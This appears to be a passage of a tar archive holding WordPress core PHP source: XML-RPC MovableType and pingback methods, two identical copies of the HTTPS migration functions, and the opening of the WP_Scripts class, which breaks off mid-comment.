$struct['id'] = $struct['attachment_id'];
$struct['file'] = $struct['title'];
$struct['url'] = $struct['link'];
return $struct;
}
/*
* MovableType API functions.
* Specs archive on https://web.archive.org/web/20050220091302/http://www.movabletype.org/docs/mtmanual_programmatic.html
*/
/**
* Retrieves the post titles of recent posts.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Optional. Number of posts.
* }
* @return array|IXR_Error
*/
public function mt_getRecentPostTitles( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
if ( isset( $args[3] ) ) {
$query = array( 'numberposts' => absint( $args[3] ) );
} else {
$query = array();
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.getRecentPostTitles', $args, $this );
$posts_list = wp_get_recent_posts( $query );
if ( ! $posts_list ) {
$this->error = new IXR_Error( 500, __( 'No posts found or an error occurred while retrieving posts.' ) );
return $this->error;
}
$recent_posts = array();
foreach ( $posts_list as $entry ) {
if ( ! current_user_can( 'edit_post', $entry['ID'] ) ) {
continue;
}
$post_date = $this->_convert_date( $entry['post_date'] );
$post_date_gmt = $this->_convert_date_gmt( $entry['post_date_gmt'], $entry['post_date'] );
$recent_posts[] = array(
'dateCreated' => $post_date,
'userid' => $entry['post_author'],
'postid' => (string) $entry['ID'],
'title' => $entry['post_title'],
'post_status' => $entry['post_status'],
'date_created_gmt' => $post_date_gmt,
);
}
return $recent_posts;
}
/**
* Retrieves the list of all categories on a blog.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function mt_getCategoryList( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you must be able to edit posts on this site in order to view categories.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.getCategoryList', $args, $this );
$categories_struct = array();
$cats = get_categories(
array(
'hide_empty' => 0,
'hierarchical' => 0,
)
);
if ( $cats ) {
foreach ( $cats as $cat ) {
$struct = array();
$struct['categoryId'] = $cat->term_id;
$struct['categoryName'] = $cat->name;
$categories_struct[] = $struct;
}
}
return $categories_struct;
}
/**
* Retrieves post categories.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function mt_getPostCategories( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! get_post( $post_id ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.getPostCategories', $args, $this );
$categories = array();
$cat_ids = wp_get_post_categories( (int) $post_id );
// First listed category will be the primary category.
$is_primary = true;
foreach ( $cat_ids as $cat_id ) {
$categories[] = array(
'categoryName' => get_cat_name( $cat_id ),
'categoryId' => (string) $cat_id,
'isPrimary' => $is_primary,
);
$is_primary = false;
}
return $categories;
}
/**
* Sets categories for a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Categories.
* }
* @return true|IXR_Error True on success.
*/
public function mt_setPostCategories( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$categories = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.setPostCategories', $args, $this );
if ( ! get_post( $post_id ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
$cat_ids = array();
foreach ( $categories as $cat ) {
$cat_ids[] = $cat['categoryId'];
}
wp_set_post_categories( $post_id, $cat_ids );
return true;
}
/**
* Retrieves an array of methods supported by this server.
*
* @since 1.5.0
*
* @return array
*/
public function mt_supportedMethods() {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.supportedMethods', array(), $this );
return array_keys( $this->methods );
}
/**
* Retrieves an empty array because we don't support per-post text filters.
*
* @since 1.5.0
*/
public function mt_supportedTextFilters() {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.supportedTextFilters', array(), $this );
/**
* Filters the MoveableType text filters list for XML-RPC.
*
* @since 2.2.0
*
* @param array $filters An array of text filters.
*/
return apply_filters( 'xmlrpc_text_filters', array() );
}
/**
* Retrieves trackbacks sent to a given post.
*
* @since 1.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param int $post_id
* @return array|IXR_Error
*/
public function mt_getTrackbackPings( $post_id ) {
global $wpdb;
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.getTrackbackPings', $post_id, $this );
$actual_post = get_post( $post_id, ARRAY_A );
if ( ! $actual_post ) {
return new IXR_Error( 404, __( 'Sorry, no such post.' ) );
}
$comments = $wpdb->get_results( $wpdb->prepare( "SELECT comment_author_url, comment_content, comment_author_IP, comment_type FROM $wpdb->comments WHERE comment_post_ID = %d", $post_id ) );
if ( ! $comments ) {
return array();
}
$trackback_pings = array();
foreach ( $comments as $comment ) {
if ( 'trackback' === $comment->comment_type ) {
$content = $comment->comment_content;
$title = substr( $content, 8, ( strpos( $content, '</strong>' ) - 8 ) );
$trackback_pings[] = array(
'pingTitle' => $title,
'pingURL' => $comment->comment_author_url,
'pingIP' => $comment->comment_author_IP,
);
}
}
return $trackback_pings;
}
/**
* Sets a post's publish status to 'publish'.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* }
* @return int|IXR_Error
*/
public function mt_publishPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.publishPost', $args, $this );
$postdata = get_post( $post_id, ARRAY_A );
if ( ! $postdata ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'publish_posts' ) || ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish this post.' ) );
}
$postdata['post_status'] = 'publish';
// Retain old categories.
$postdata['post_category'] = wp_get_post_categories( $post_id );
$this->escape( $postdata );
return wp_update_post( $postdata );
}
/*
* Pingback functions.
* Specs on www.hixie.ch/specs/pingback/pingback
*/
/**
* Retrieves a pingback and registers it.
*
* @since 1.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type string $0 URL of page linked from.
* @type string $1 URL of page linked to.
* }
* @return string|IXR_Error
*/
public function pingback_ping( $args ) {
global $wpdb;
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'pingback.ping', $args, $this );
$this->escape( $args );
$pagelinkedfrom = str_replace( '&', '&', $args[0] );
$pagelinkedto = str_replace( '&', '&', $args[1] );
$pagelinkedto = str_replace( '&', '&', $pagelinkedto );
/**
* Filters the pingback source URI.
*
* @since 3.6.0
*
* @param string $pagelinkedfrom URI of the page linked from.
* @param string $pagelinkedto URI of the page linked to.
*/
$pagelinkedfrom = apply_filters( 'pingback_ping_source_uri', $pagelinkedfrom, $pagelinkedto );
if ( ! $pagelinkedfrom ) {
return $this->pingback_error( 0, __( 'A valid URL was not provided.' ) );
}
// Check if the page linked to is on our site.
$pos1 = strpos( $pagelinkedto, str_replace( array( 'http://www.', 'http://', 'https://www.', 'https://' ), '', get_option( 'home' ) ) );
if ( ! $pos1 ) {
return $this->pingback_error( 0, __( 'Is there no link to us?' ) );
}
/*
* Let's find which post is linked to.
* FIXME: Does url_to_postid() cover all these cases already?
* If so, then let's use it and drop the old code.
*/
$urltest = parse_url( $pagelinkedto );
$post_id = url_to_postid( $pagelinkedto );
if ( $post_id ) {
// $way
} elseif ( isset( $urltest['path'] ) && preg_match( '#p/[0-9]{1,}#', $urltest['path'], $match ) ) {
// The path defines the post_ID (archives/p/XXXX).
$blah = explode( '/', $match[0] );
$post_id = (int) $blah[1];
} elseif ( isset( $urltest['query'] ) && preg_match( '#p=[0-9]{1,}#', $urltest['query'], $match ) ) {
// The query string defines the post_ID (?p=XXXX).
$blah = explode( '=', $match[0] );
$post_id = (int) $blah[1];
} elseif ( isset( $urltest['fragment'] ) ) {
// An #anchor is there, it's either...
if ( (int) $urltest['fragment'] ) {
// ...an integer #XXXX (simplest case),
$post_id = (int) $urltest['fragment'];
} elseif ( preg_match( '/post-[0-9]+/', $urltest['fragment'] ) ) {
// ...a post ID in the form 'post-###',
$post_id = preg_replace( '/[^0-9]+/', '', $urltest['fragment'] );
} elseif ( is_string( $urltest['fragment'] ) ) {
// ...or a string #title, a little more complicated.
$title = preg_replace( '/[^a-z0-9]/i', '.', $urltest['fragment'] );
$sql = $wpdb->prepare( "SELECT ID FROM $wpdb->posts WHERE post_title RLIKE %s", $title );
$post_id = $wpdb->get_var( $sql );
if ( ! $post_id ) {
// Returning unknown error '0' is better than die()'ing.
return $this->pingback_error( 0, '' );
}
}
} else {
// TODO: Attempt to extract a post ID from the given URL.
return $this->pingback_error( 33, __( 'The specified target URL cannot be used as a target. It either does not exist, or it is not a pingback-enabled resource.' ) );
}
$post_id = (int) $post_id;
$post = get_post( $post_id );
if ( ! $post ) { // Post not found.
return $this->pingback_error( 33, __( 'The specified target URL cannot be used as a target. It either does not exist, or it is not a pingback-enabled resource.' ) );
}
if ( url_to_postid( $pagelinkedfrom ) === $post_id ) {
return $this->pingback_error( 0, __( 'The source URL and the target URL cannot both point to the same resource.' ) );
}
// Check if pings are on.
if ( ! pings_open( $post ) ) {
return $this->pingback_error( 33, __( 'The specified target URL cannot be used as a target. It either does not exist, or it is not a pingback-enabled resource.' ) );
}
// Let's check that the remote site didn't already pingback this entry.
if ( $wpdb->get_results( $wpdb->prepare( "SELECT * FROM $wpdb->comments WHERE comment_post_ID = %d AND comment_author_url = %s", $post_id, $pagelinkedfrom ) ) ) {
return $this->pingback_error( 48, __( 'The pingback has already been registered.' ) );
}
/*
* The remote site may have sent the pingback before it finished publishing its own content
* containing this pingback URL. If that happens then it won't be immediately possible to fetch
* the pinging post; adding a small delay reduces the likelihood of this happening.
*
* While there are more robust methods than calling `sleep()` here (because `sleep()` merely
* mitigates the risk of requesting the remote post before it's available), this is effective
* enough for most cases and avoids introducing more complexity into this code.
*
* One way to improve the reliability of this code might be to add failure-handling to the remote
* fetch and retry up to a set number of times if it receives a 404. This could also handle 401 and
* 403 responses to differentiate the "does not exist" failure from the "may not access" failure.
*/
sleep( 1 );
$remote_ip = preg_replace( '/[^0-9a-fA-F:., ]/', '', $_SERVER['REMOTE_ADDR'] );
/** This filter is documented in wp-includes/class-wp-http.php */
$user_agent = apply_filters( 'http_headers_useragent', 'WordPress/' . get_bloginfo( 'version' ) . '; ' . get_bloginfo( 'url' ), $pagelinkedfrom );
// Let's check the remote site.
$http_api_args = array(
'timeout' => 10,
'redirection' => 0,
'limit_response_size' => 153600, // 150 KB
'user-agent' => "$user_agent; verifying pingback from $remote_ip",
'headers' => array(
'X-Pingback-Forwarded-For' => $remote_ip,
),
);
$request = wp_safe_remote_get( $pagelinkedfrom, $http_api_args );
$remote_source = wp_remote_retrieve_body( $request );
$remote_source_original = $remote_source;
if ( ! $remote_source ) {
return $this->pingback_error( 16, __( 'The source URL does not exist.' ) );
}
/**
* Filters the pingback remote source.
*
* @since 2.5.0
*
* @param string $remote_source Response source for the page linked from.
* @param string $pagelinkedto URL of the page linked to.
*/
$remote_source = apply_filters( 'pre_remote_source', $remote_source, $pagelinkedto );
// Work around bug in strip_tags():
$remote_source = str_replace( '<!DOC', '<DOC', $remote_source );
$remote_source = preg_replace( '/[\r\n\t ]+/', ' ', $remote_source ); // normalize spaces
$remote_source = preg_replace( '/<\/*(h1|h2|h3|h4|h5|h6|p|th|td|li|dt|dd|pre|caption|input|textarea|button|body)[^>]*>/', "\n\n", $remote_source );
preg_match( '|<title>([^<]*?)</title>|is', $remote_source, $matchtitle );
$title = isset( $matchtitle[1] ) ? $matchtitle[1] : '';
if ( empty( $title ) ) {
return $this->pingback_error( 32, __( 'A title on that page cannot be found.' ) );
}
// Remove all script and style tags including their content.
$remote_source = preg_replace( '@<(script|style)[^>]*?>.*?</\\1>@si', '', $remote_source );
// Just keep the tag we need.
$remote_source = strip_tags( $remote_source, '<a>' );
$p = explode( "\n\n", $remote_source );
$preg_target = preg_quote( $pagelinkedto, '|' );
foreach ( $p as $para ) {
if ( str_contains( $para, $pagelinkedto ) ) { // It exists, but is it a link?
preg_match( '|<a[^>]+?' . $preg_target . '[^>]*>([^>]+?)</a>|', $para, $context );
// If the URL isn't in a link context, keep looking.
if ( empty( $context ) ) {
continue;
}
/*
* We're going to use this fake tag to mark the context in a bit.
* The marker is needed in case the link text appears more than once in the paragraph.
*/
$excerpt = preg_replace( '|\</?wpcontext\>|', '', $para );
// prevent really long link text
if ( strlen( $context[1] ) > 100 ) {
$context[1] = substr( $context[1], 0, 100 ) . '…';
}
$marker = '<wpcontext>' . $context[1] . '</wpcontext>'; // Set up our marker.
$excerpt = str_replace( $context[0], $marker, $excerpt ); // Swap out the link for our marker.
$excerpt = strip_tags( $excerpt, '<wpcontext>' ); // Strip all tags but our context marker.
$excerpt = trim( $excerpt );
$preg_marker = preg_quote( $marker, '|' );
$excerpt = preg_replace( "|.*?\s(.{0,100}$preg_marker.{0,100})\s.*|s", '$1', $excerpt );
$excerpt = strip_tags( $excerpt ); // YES, again, to remove the marker wrapper.
break;
}
}
if ( empty( $context ) ) { // Link to target not found.
return $this->pingback_error( 17, __( 'The source URL does not contain a link to the target URL, and so cannot be used as a source.' ) );
}
$pagelinkedfrom = str_replace( '&', '&', $pagelinkedfrom );
$context = '[…] ' . esc_html( $excerpt ) . ' […]';
$pagelinkedfrom = $this->escape( $pagelinkedfrom );
$comment_post_id = (int) $post_id;
$comment_author = $title;
$comment_author_email = '';
$this->escape( $comment_author );
$comment_author_url = $pagelinkedfrom;
$comment_content = $context;
$this->escape( $comment_content );
$comment_type = 'pingback';
$commentdata = array(
'comment_post_ID' => $comment_post_id,
);
$commentdata += compact(
'comment_author',
'comment_author_url',
'comment_author_email',
'comment_content',
'comment_type',
'remote_source',
'remote_source_original'
);
$comment_id = wp_new_comment( $commentdata );
if ( is_wp_error( $comment_id ) ) {
return $this->pingback_error( 0, $comment_id->get_error_message() );
}
/**
* Fires after a post pingback has been sent.
*
* @since 0.71
*
* @param int $comment_id Comment ID.
*/
do_action( 'pingback_post', $comment_id );
/* translators: 1: URL of the page linked from, 2: URL of the page linked to. */
return sprintf( __( 'Pingback from %1$s to %2$s registered. Keep the web talking! :-)' ), $pagelinkedfrom, $pagelinkedto );
}
/**
* Retrieves an array of URLs that pingbacked the given URL.
*
* Specs on http://www.aquarionics.com/misc/archives/blogite/0198.html
*
* @since 1.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $url
* @return array|IXR_Error
*/
public function pingback_extensions_getPingbacks( $url ) {
global $wpdb;
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'pingback.extensions.getPingbacks', $url, $this );
$url = $this->escape( $url );
$post_id = url_to_postid( $url );
if ( ! $post_id ) {
// We aren't sure that the resource is available and/or pingback enabled.
return $this->pingback_error( 33, __( 'The specified target URL cannot be used as a target. It either does not exist, or it is not a pingback-enabled resource.' ) );
}
$actual_post = get_post( $post_id, ARRAY_A );
if ( ! $actual_post ) {
// No such post = resource not found.
return $this->pingback_error( 32, __( 'The specified target URL does not exist.' ) );
}
$comments = $wpdb->get_results( $wpdb->prepare( "SELECT comment_author_url, comment_content, comment_author_IP, comment_type FROM $wpdb->comments WHERE comment_post_ID = %d", $post_id ) );
if ( ! $comments ) {
return array();
}
$pingbacks = array();
foreach ( $comments as $comment ) {
if ( 'pingback' === $comment->comment_type ) {
$pingbacks[] = $comment->comment_author_url;
}
}
return $pingbacks;
}
/**
* Sends a pingback error based on the given error code and message.
*
* @since 3.6.0
*
* @param int $code Error code.
* @param string $message Error message.
* @return IXR_Error Error object.
*/
protected function pingback_error( $code, $message ) {
/**
* Filters the XML-RPC pingback error return.
*
* @since 3.5.1
*
* @param IXR_Error $error An IXR_Error object containing the error code and message.
*/
return apply_filters( 'xmlrpc_pingback_error', new IXR_Error( $code, $message ) );
}
}
https-migration-20260605201229-20260621081100.php 0000666 00000011205 15224151221 0013340 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605201854-20260621203049.php 0000666 00000011205 15224151221 0013354 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-scripts-20260605024413-20260621185521.php 0000666 00000104060 15224151221 0013441 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* @since 2.6.0
*
* @package WordPress
* @subpackage Dependencies
*/
/**
* Core class used to register scripts.
*
* @since 2.1.0
*
* @see WP_Dependencies
*/
class WP_Scripts extends WP_Dependencies {
/**
* Base URL for scripts.
*
* Full URL with trailing slash.
*
* @since 2.6.0
* @var string
*/
public $base_url;
/**
* URL of the content directory.
*
* @since 2.8.0
* @var string
*/
public $content_url;
/**
* Default version string for scripts.
*
* @since 2.6.0
* @var string
*/
public $default_version;
/**
* Holds handles of scripts which are enqueued in footer.
*
* @since 2.8.0
* @var array
*/
public $in_footer = array();
/**
* Holds a list of script handles which will be concatenated.
*
* @since 2.8.0
* @var string
*/
public $concat = '';
/**
* Holds a string which contains script handles and their version.
*
* @since 2.8.0
* @deprecated 3.4.0
* @var string
*/
public $concat_version = '';
/**
* Whether to perform concatenation.
*
* @since 2.8.0
* @var bool
*/
public $do_concat = false;
/**
* Holds HTML markup of scripts and additional data if concatenation
* is enabled.
*
* @since 2.8.0
* @var string
*/
public $print_html = '';
/**
* Holds inline code if concatenation is enabled.
*
* @since 2.8.0
* @var string
*/
public $print_code = '';
/**
* Holds a list of script handles which are not in the default directory
* if concatenation is enabled.
*
* Unused in core.
*
* @since 2.8.0
* @var string
*/
public $ext_handles = '';
/**
* Holds a string which contains handles and versions of scripts which
* are not in the default directory if concatenation is enabled.
*
* Unused in core.
*
* @since 2.8.0
* @var string
*/
public $ext_version = '';
/**
* List of default directories.
*
* @since 2.8.0
* @var array
*/
public $default_dirs;
/**
* Holds a mapping of dependents (as handles) for a given script handle.
* Used to optimize recursive dependency tree checks.
*
* @since 6.3.0
* @var array<string, string[]>
*/
private $dependents_map = array();
/**
* Holds a reference to the delayed (non-blocking) script loading strategies.
* Used by methods that validate loading strategies.
*
* @since 6.3.0
* @var string[]
*/
private $delayed_strategies = array( 'defer', 'async' );
/**
* Constructor.
*
* @since 2.6.0
*/
public function __construct() {
$this->init();
add_action( 'init', array( $this, 'init' ), 0 );
}
/**
* Initialize the class.
*
* @since 3.4.0
*/
public function init() {
/**
* Fires when the WP_Scripts instance is initialized.
*
* @since 2.6.0
*
* @param WP_Scripts $wp_scripts WP_Scripts instance (passed by reference).
*/
do_action_ref_array( 'wp_default_scripts', array( &$this ) );
}
/**
* Prints scripts.
*
* Prints the scripts passed to it or the print queue. Also prints all necessary dependencies.
*
* @since 2.1.0
* @since 2.8.0 Added the `$group` parameter.
*
* @param string|string[]|false $handles Optional. Scripts to be printed: queue (false),
* single script (string), or multiple scripts (array of strings).
* Default false.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return string[] Handles of scripts that have been printed.
*/
public function print_scripts( $handles = false, $group = false ) {
return $this->do_items( $handles, $group );
}
/**
* Prints extra scripts of a registered script.
*
* @since 2.1.0
* @since 2.8.0 Added the `$display` parameter.
* @deprecated 3.3.0
*
* @see print_extra_script()
*
* @param string $handle The script's registered handle.
* @param bool $display Optional. Whether to print the extra script
* instead of just returning it. Default true.
* @return bool|string|void Void if no data exists, extra scripts if `$display` is true,
* true otherwise.
*/
public function print_scripts_l10n( $handle, $display = true ) {
_deprecated_function( __FUNCTION__, '3.3.0', 'WP_Scripts::print_extra_script()' );
return $this->print_extra_script( $handle, $display );
}
/**
* Prints extra scripts of a registered script.
*
* @since 3.3.0
*
* @param string $handle The script's registered handle.
* @param bool $display Optional. Whether to print the extra script
* instead of just returning it. Default true.
* @return bool|string|void Void if no data exists, extra scripts if `$display` is true,
* true otherwise.
*/
public function print_extra_script( $handle, $display = true ) {
$output = $this->get_data( $handle, 'data' );
if ( ! $output ) {
return;
}
/*
* Do not print a sourceURL comment if concatenation is enabled.
*
* Extra scripts may be concatenated into a single script.
* The line-based sourceURL comments may break concatenated scripts
* and do not make sense when multiple scripts are joined together.
*/
if ( ! $this->do_concat ) {
$output .= sprintf(
"\n//# sourceURL=%s",
rawurlencode( "{$handle}-js-extra" )
);
}
if ( ! $display ) {
return $output;
}
wp_print_inline_script_tag( $output, array( 'id' => "{$handle}-js-extra" ) );
return true;
}
/**
* Checks whether all dependents of a given handle are in the footer.
*
* If there are no dependents, this is considered the same as if all dependents were in the footer.
*
* @since 6.4.0
*
* @param string $handle Script handle.
* @return bool Whether all dependents are in the footer.
*/
private function are_all_dependents_in_footer( $handle ) {
foreach ( $this->get_dependents( $handle ) as $dep ) {
if ( isset( $this->groups[ $dep ] ) && 0 === $this->groups[ $dep ] ) {
return false;
}
}
return true;
}
/**
* Processes a script dependency.
*
* @since 2.6.0
* @since 2.8.0 Added the `$group` parameter.
*
